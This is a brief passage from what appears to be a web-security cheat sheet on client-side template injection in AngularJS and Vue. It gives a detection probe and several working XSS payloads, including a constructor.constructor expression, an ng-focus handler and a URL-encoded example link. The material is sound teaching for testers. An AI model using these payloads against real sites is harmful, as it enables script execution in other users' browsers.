{{ 7-7 }}
if the server is vulnerable you will see a 0
and if not you will see the original: {{ 7-7 }}
ng-app
attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces.
For example, if your input is being reflected inside the body of the HTML and the body is defined with ng-app
: <body ng-app>
{{constructor.constructor('alert(1)')()}}
or <input ng-focus=$event.view.alert('XSS')>
should work.https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%